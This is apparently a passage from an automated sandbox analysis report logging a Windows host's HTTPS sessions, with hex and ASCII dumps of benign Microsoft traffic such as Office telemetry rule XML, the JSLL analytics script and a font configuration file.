                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                                                            Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                                                            Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            71192.168.2.54979913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                            x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-16547b76f7fvllnfhC1DFWxkg800000006pg00000000f89h
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            72192.168.2.54980013.107.253.454433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                            Host: js.monitor.azure.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 207935
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                            ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                            x-ms-request-id: 8d896b17-401e-00b1-17a3-2ddeca000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                            x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-158dbd74bf4wlzpzhC1SN10qvc00000005b0000000006sym
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                                            Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                                            Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                            Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                                            Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                                            Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                            Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                                            Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                                            Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                                            Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                                            Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            73192.168.2.549804184.28.90.27443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                            Cache-Control: public, max-age=149035
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            74192.168.2.54980513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                            x-ms-request-id: 2d5e3293-901e-002a-4f00-2d7a27000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-16547b76f7fcrtpchC1DFW52e800000006tg000000005hvy
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
